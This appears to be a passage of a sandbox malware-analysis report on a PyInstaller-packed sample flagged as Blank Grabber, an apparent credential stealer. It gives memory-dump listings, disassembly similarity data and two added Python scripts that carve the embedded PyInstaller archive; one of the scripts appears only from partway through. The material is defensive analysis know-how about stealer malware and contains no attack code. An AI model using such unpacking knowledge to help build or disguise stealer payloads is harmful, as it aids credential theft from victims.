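        raise ValueError("uncompressed length does not match the TOC")
    return out


def build_sample_archive(trailer: bytes = b"") -> bytes:
    # Constructed stand-in for a onefile executable: a fake 128-byte PE prefix,
    # three entries, TOC entries padded to 16-byte multiples as PyInstaller 5+
    # writes them, and the cookie. `trailer` stands in for bytes that follow the
    # cookie in a signed binary. Names and the version number are placeholders.
    prefix = b"MZ" + b"\0" * 126
    items = [("pyiboot01_bootstrap", b"s", b"import sys\n", False),
             ("PYZ-00.pyz", b"z", b"PYZ\0" * 8, False),
             ("payload.txt", b"x", b"hello from the bundle\n" * 20, True)]
    body, toc = b"", b""
    for name, typ, plain, comp in items:
        blob = zlib.compress(plain) if comp else plain
        nm = name.encode() + b"\0"
        nm += b"\0" * (-(TOC_ENTRY_LEN + len(nm)) % 16)
        toc += struct.pack(TOC_ENTRY_FMT, TOC_ENTRY_LEN + len(nm), len(body),
                           len(blob), len(plain), int(comp), typ) + nm
        body += blob
    pkg_len = len(body) + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, COOKIE_MAGIC, pkg_len, len(body), len(toc),
                         312, b"python312.dll")
    return prefix + body + toc + cookie + trailer


if __name__ == "__main__":
    sample = build_sample_archive()
    archive = parse_carchive(sample)
    print(f"archive at +{archive.start:#x}, python {archive.python_version}, {archive.pylib_name}")
    for e in archive.entries:
        print(f"  {e.typecode} {e.name:24s} {e.compressed_len:6d} -> {e.uncompressed_len:6d}")
```

To run it against the real sample, replace the constructed bytes with the contents of the file; entries of type 'z' are a nested PYZ archive of compiled modules, and the 'x' data entries are where bundles of this kind usually keep their configuration. The length checks and the bounded inflate are not cosmetic: a hand-edited TOC can otherwise drive a decompression bomb or an out-of-range slice in a careless extractor, which is exactly the kind of sample an analyst is handling here.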
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
• Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
                                                                                                                                                                                                                                          • API String ID: 0-352295518
                                                                                                                                                                                                                                          • Opcode ID: 3479779f4e97ba25f539c5ee64d721bf2629ffcc85696f0b63aa88c04eb821c1
                                                                                                                                                                                                                                          • Instruction ID: d48acc1fe5c589b88c955a977604eeabb911dd1e9e78fbb49505ceccce7fb6d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3479779f4e97ba25f539c5ee64d721bf2629ffcc85696f0b63aa88c04eb821c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3729D72A4E682D6FB208E15E4447B937A0EB84BC8F144135DA6D8B78CDFBDD994C700

Control-flow Graph (graph rendering not reproduced; function at 7ff67aef69d4)

APIs
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction ID: 9775d139d67edc4f97f44dc2b06c4b49005f967b52a26ff5bcff6be1e530c7ca
• Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction Fuzzy Hash: 89C1D037B38A8286EB50EFA4D4902AC3761FB49B98B015279DE6E973E4CF38D411D700
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3004955837.00007FF8A8AA6000.00000080.00000001.01000000.00000016.sdmp, Offset: 00007FF8A8750000, based on PE: true
• Associated: 00000006.00000002.3002926988.00007FF8A8750000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A8751000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A875D000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A87B5000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A87C9000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A87D9000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A87ED000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A899E000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A89A0000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A89CB000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A89FD000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A8A22000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A8A70000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A8A76000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A8A78000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A8A95000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3002970846.00007FF8A8AA2000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3005011004.00007FF8A8AA8000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8a8750000_D1UL0FG.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID: pkey_poly1305_init$wB5
• API String ID: 3300690313-1105255960
• Opcode ID: 586537f4082271bd79903f91da2f6e0ac042010b88824cea82960b6bec6abf0e
• Instruction ID: b94739d99f30637368b18d4943dd652dfa178346a2a320cf651b439f4417a8fb
• Opcode Fuzzy Hash: 586537f4082271bd79903f91da2f6e0ac042010b88824cea82960b6bec6abf0e
• Instruction Fuzzy Hash: CA62332262A59296E7598E38D40127AB7A0F7487C5F045132EADEC3BC4FB3CFA45CB15
APIs
Memory Dump Source
• Source File: 00000006.00000002.3009045792.00007FF8B90F2000.00000080.00000001.01000000.00000018.sdmp, Offset: 00007FF8B90E0000, based on PE: true
• Associated: 00000006.00000002.3008735851.00007FF8B90E0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3008792565.00007FF8B90E1000.00000040.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3008792565.00007FF8B90EC000.00000040.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3008792565.00007FF8B90EE000.00000040.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3008792565.00007FF8B90F1000.00000040.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3010026113.00007FF8B90F4000.00000004.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8b90e0000_D1UL0FG.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
• Opcode ID: e3da923a961653f7e51c42cb2b61e8afaa56e9ac0760d8dbda0bfdb68c10b2b1
• Instruction ID: 92dd807330fe8386ed1084843878383ee63274f160089ecf0f3559cc0e76ac83
• Opcode Fuzzy Hash: e3da923a961653f7e51c42cb2b61e8afaa56e9ac0760d8dbda0bfdb68c10b2b1
• Instruction Fuzzy Hash: BD62E06262C5D287EB198E3DD4003B9B6A0F7487D5F045536EB9EC3784EA7DEA46CB00
APIs
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction ID: d28ffa42b0d84b46a6519afa3a2c2f60d18f75212e6962a0310a220fa363a27b
• Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction Fuzzy Hash: 4EF06863A3874186FBA09F60B8497667350EBC8764F140775EAAD42BE4DF3CD049DA00

Control-flow Graph (graph rendering not reproduced; function at 7ff67aed1950)

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED7F80: _fread_nolock.LIBCMT ref: 00007FF67AED802A
                                                                                                                                                                                                                                          • _fread_nolock.LIBCMT ref: 00007FF67AED1A1B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF67AED1B6A), ref: 00007FF67AED295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                          • Opcode ID: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                                                                                                                                                          • Instruction ID: b2a02993556ecdc16b705cf08276494c7cbd6882b58917f26097cdbe1aa66f93
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50819573A2CA8685E764FB24E0402FD23A1EF84784F5444B5E98DC77A5DE3CE585EB40

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 8300a19c8206d2102841afb71172eaa2682942542eff747ed74e125f239e34bf
• Instruction ID: 66be77be411398093f21bb916bc5d6cc1e10f5c733e724d9ff00923978f0fc58
• Opcode Fuzzy Hash: 8300a19c8206d2102841afb71172eaa2682942542eff747ed74e125f239e34bf
• Instruction Fuzzy Hash: 38416F23B2868289FB10FB31A5405B96390FF84794F5449B6ED4D87BB5DE3CE541EB00

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph rendered in the original report; recoverable information only: function 7ff67aed1210-7ff67aed146d, calls 7ff67aedbdf0, 7ff67aed2710, 7ff67aee4fb4, 7ff67aee4f78, 7ff67aed2910, 7ff67aedbad0, 7ff67aee4fa0 (twice), 7ff67aee040c, 7ff67aee0180, 7ff67aeda230, 7ff67aee0b4c and 7ff67aef9ea0]
Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 0fca6e7335867edc6b8860f5dfbc0b69d345714f0ea111fe4b1d6fcc205b14f0
• Instruction ID: 1ec7006b102bf207a0378e5772f1d5a93109ec49e5ea2f35d8cc00beffea3e4f
• Opcode Fuzzy Hash: 0fca6e7335867edc6b8860f5dfbc0b69d345714f0ea111fe4b1d6fcc205b14f0
• Instruction Fuzzy Hash: 7651D023A2C68285EA60BB22A4003BE6691FF85B94FA44175ED4DC77E5EF3CE541E700
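The three functions above share one vocabulary: a "MEI" cookie that has to be seeked to and read, a table of contents ("TOC") allocated with calloc and read with fread, per-entry "Failed to extract %s" errors, and an inflateInit() call that is handed the version string "1.3.1" (the zlib release it was built against; inflateInit is a macro that passes ZLIB_VERSION). That is the archive-reading path of a PyInstaller-style bootloader, which fits a Python-based payload such as the Blank Grabber detection listed for this sample. The script below is an added example, not code from the sample or from Joe Sandbox: it reimplements that reader in Python so an analyst can carve the embedded archive out of the on-disk image (dump the mapped module or use the original file.exe; the cookie sits at the end of the file, after the PE). The cookie and TOC layouts are the PyInstaller CArchive format as assumed here; the two-entry archive is constructed inline for illustration and is not the sample's real payload.

```python
"""Carve a PyInstaller CArchive the way the bootloader does: locate the
cookie from the end of the file, read the TOC, inflate each entry.
Added example; layout assumed from the PyInstaller CArchive format."""
import struct
import zlib

# Cookie that terminates every PyInstaller archive; the bootloader scans the
# tail of its own executable for this magic ("MEI" + 5 control bytes).
COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, archive length, TOC offset, TOC length, python version, python lib name
COOKIE_FMT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)  # 88 bytes
# TOC entry header: entry length, data offset, compressed length, uncompressed
# length, compression flag, type code; the NUL-padded name follows the header.
TOC_FMT = "!iIIIBc"
TOC_HDR_SIZE = struct.calcsize(TOC_FMT)  # 18 bytes
TYPE_CODES = {b"b": "binary", b"z": "zlib archive (PYZ)", b"m": "module",
              b"M": "package", b"s": "script", b"x": "data",
              b"d": "dependency", b"o": "runtime option"}


def find_cookie(blob):
    """Offset of the cookie, searched backwards from the end like the bootloader."""
    pos = blob.rfind(COOKIE_MAGIC)
    if pos < 0:
        raise ValueError("no PyInstaller cookie found")
    if pos + COOKIE_SIZE > len(blob):
        raise ValueError("Failed to read cookie!")  # truncated tail
    return pos


def parse_cookie(blob, pos):
    magic, length, toc_off, toc_len, pyvers, pylib = struct.unpack(
        COOKIE_FMT, blob[pos:pos + COOKIE_SIZE])
    # Every offset in the archive is relative to pkg_start, which the loader
    # derives from the cookie position and the length recorded in the cookie.
    pkg_start = pos + COOKIE_SIZE - length
    if pkg_start < 0 or toc_off + toc_len > length:
        raise ValueError("cookie lengths inconsistent with file size")
    return {"pkg_start": pkg_start, "toc_off": toc_off, "toc_len": toc_len,
            "pyvers": pyvers, "pylib": pylib.rstrip(b"\0").decode("ascii", "replace")}


def parse_toc(blob, cookie):
    """Walk the TOC; each entry carries its own length, so the reader checks it
    against the TOC end instead of trusting it (the loader's 'full TOC' check)."""
    entries, p = [], cookie["pkg_start"] + cookie["toc_off"]
    end = p + cookie["toc_len"]
    while p < end:
        if p + TOC_HDR_SIZE > end:
            raise ValueError("Could not read full TOC!")
        entry_len, off, clen, ulen, cflag, typ = struct.unpack(TOC_FMT, blob[p:p + TOC_HDR_SIZE])
        if entry_len < TOC_HDR_SIZE or p + entry_len > end:
            raise ValueError("Could not read full TOC!")
        name = blob[p + TOC_HDR_SIZE:p + entry_len].rstrip(b"\0").decode("utf-8", "replace")
        entries.append({"name": name, "offset": off, "clen": clen, "ulen": ulen,
                        "compressed": bool(cflag), "type": TYPE_CODES.get(typ, typ.decode())})
        p += entry_len
    return entries


def extract(blob, cookie, entry):
    """Return an entry's plaintext, inflating it when the TOC flags it compressed."""
    start = cookie["pkg_start"] + entry["offset"]
    raw = blob[start:start + entry["clen"]]
    if len(raw) != entry["clen"]:
        raise ValueError("Failed to extract %s: failed to read data chunk!" % entry["name"])
    data = zlib.decompress(raw) if entry["compressed"] else raw
    if len(data) != entry["ulen"]:
        raise ValueError("Failed to extract %s: length mismatch" % entry["name"])
    return data


def build_sample_archive(stub=b"STUB-EXE-BYTES-", pyvers=311, pylib=b"python311.dll"):
    """Constructed sample (assumption for illustration): a fake loader stub with a
    two-entry archive appended, one zlib-compressed module and one raw data blob."""
    items = [("pyiboot01_bootstrap", b"m", True, b"import sys\nprint('hi')\n" * 20),
             ("payload.bin", b"x", False, b"\x00\x01\x02\x03" * 8)]
    body, toc = b"", b""
    for name, typ, comp, data in items:
        stored = zlib.compress(data, 9) if comp else data
        nm = name.encode() + b"\0"
        entry_len = TOC_HDR_SIZE + len(nm)
        entry_len += (16 - entry_len % 16) % 16  # writer pads entries to 16 bytes
        toc += struct.pack(TOC_FMT, entry_len, len(body), len(stored), len(data), int(comp), typ)
        toc += nm.ljust(entry_len - TOC_HDR_SIZE, b"\0")
        body += stored
    toc_off = len(body)
    length = toc_off + len(toc) + COOKIE_SIZE  # archive length includes the cookie
    cookie = struct.pack(COOKIE_FMT, COOKIE_MAGIC, length, toc_off, len(toc), pyvers, pylib)
    return stub + body + toc + cookie


def list_archive(blob):
    """cookie -> TOC -> {name: (entry, extracted bytes)}"""
    cookie = parse_cookie(blob, find_cookie(blob))
    return cookie, {e["name"]: (e, extract(blob, cookie, e)) for e in parse_toc(blob, cookie)}


if __name__ == "__main__":
    cookie, entries = list_archive(build_sample_archive())
    print("python %d, %s" % (cookie["pyvers"], cookie["pylib"]))
    for name, (e, data) in entries.items():
        print("%-22s %-20s %6d -> %6d bytes" % (name, e["type"], e["clen"], e["ulen"]))
```

To run it against a real bundle, pass the bytes of the dropped or submitted executable to list_archive() rather than a memory dump: the cookie and TOC live in the overlay after the PE image, which the loader reads from its own file with fseek/fread (the _fread_nolock calls above) and which is not mapped as part of the module. Entries of type "z" are themselves PYZ archives and need a second pass.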

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF67AED3804), ref: 00007FF67AED36E1
• GetLastError.KERNEL32(?,00007FF67AED3804), ref: 00007FF67AED36EB
  • Part of subcall function 00007FF67AED2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2C9E
  • Part of subcall function 00007FF67AED2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2D63
  • Part of subcall function 00007FF67AED2C50: MessageBoxW.USER32 ref: 00007FF67AED2D99
Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction ID: 1068035de5f70f2578dc069b75941140bd83d80a52dbb56b8f66637b006debcc
• Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction Fuzzy Hash: 98216563B3CA4381FA65BB24E8513B62250BFC8394FA041B6E55DC25F5EF2CE505E740

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1217 7ff67aeebacc-7ff67aeebaf2 1218 7ff67aeebaf4-7ff67aeebb08 call 7ff67aee4f58 call 7ff67aee4f78 1217->1218 1219 7ff67aeebb0d-7ff67aeebb11 1217->1219 1233 7ff67aeebefe 1218->1233 1220 7ff67aeebee7-7ff67aeebef3 call 7ff67aee4f58 call 7ff67aee4f78 1219->1220 1221 7ff67aeebb17-7ff67aeebb1e 1219->1221 1240 7ff67aeebef9 call 7ff67aeea950 1220->1240 1221->1220 1224 7ff67aeebb24-7ff67aeebb52 1221->1224 1224->1220 1227 7ff67aeebb58-7ff67aeebb5f 1224->1227 1230 7ff67aeebb61-7ff67aeebb73 call 7ff67aee4f58 call 7ff67aee4f78 1227->1230 1231 7ff67aeebb78-7ff67aeebb7b 1227->1231 1230->1240 1236 7ff67aeebee3-7ff67aeebee5 1231->1236 1237 7ff67aeebb81-7ff67aeebb87 1231->1237 1238 7ff67aeebf01-7ff67aeebf18 1233->1238 1236->1238 1237->1236 1241 7ff67aeebb8d-7ff67aeebb90 1237->1241 1240->1233 1241->1230 1244 7ff67aeebb92-7ff67aeebbb7 1241->1244 1245 7ff67aeebbea-7ff67aeebbf1 1244->1245 1246 7ff67aeebbb9-7ff67aeebbbb 1244->1246 1250 7ff67aeebbf3-7ff67aeebbff call 7ff67aeed66c 1245->1250 1251 7ff67aeebbc6-7ff67aeebbdd call 7ff67aee4f58 call 7ff67aee4f78 call 7ff67aeea950 1245->1251 1248 7ff67aeebbe2-7ff67aeebbe8 1246->1248 1249 7ff67aeebbbd-7ff67aeebbc4 1246->1249 1253 7ff67aeebc68-7ff67aeebc7f 1248->1253 1249->1248 1249->1251 1258 7ff67aeebc04-7ff67aeebc1b call 7ff67aeea9b8 * 2 1250->1258 1282 7ff67aeebd70 1251->1282 1256 7ff67aeebc81-7ff67aeebc89 1253->1256 1257 7ff67aeebcfa-7ff67aeebd04 call 7ff67aef398c 1253->1257 1256->1257 1261 7ff67aeebc8b-7ff67aeebc8d 1256->1261 1269 7ff67aeebd8e 1257->1269 1270 7ff67aeebd0a-7ff67aeebd1f 1257->1270 1278 7ff67aeebc1d-7ff67aeebc33 call 7ff67aee4f78 call 7ff67aee4f58 1258->1278 1279 7ff67aeebc38-7ff67aeebc63 call 7ff67aeec2f4 1258->1279 1261->1257 1265 7ff67aeebc8f-7ff67aeebca5 1261->1265 1265->1257 
(continuation of control-flow graph edge list omitted; basic blocks 7ff67aeebca7-7ff67aeebede; API calls: ReadFile, GetConsoleMode, ReadConsoleW, GetLastError; internal calls to 7ff67aee4f78, 7ff67aee4f58, 7ff67aeea9b8, 7ff67aee4eec, 7ff67aeeb6e4, 7ff67aeeb524)
APIs
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
• Instruction ID: d0ead601fb27bc2e1149926211b3a1ea62341e7b40367654e4185b2ffb169fc3
• Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
• Instruction Fuzzy Hash: 53C1F633A2C68781F760AB1594402BD77A4FB81B80F5582B1EA8E877F1CF7DE8459700

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
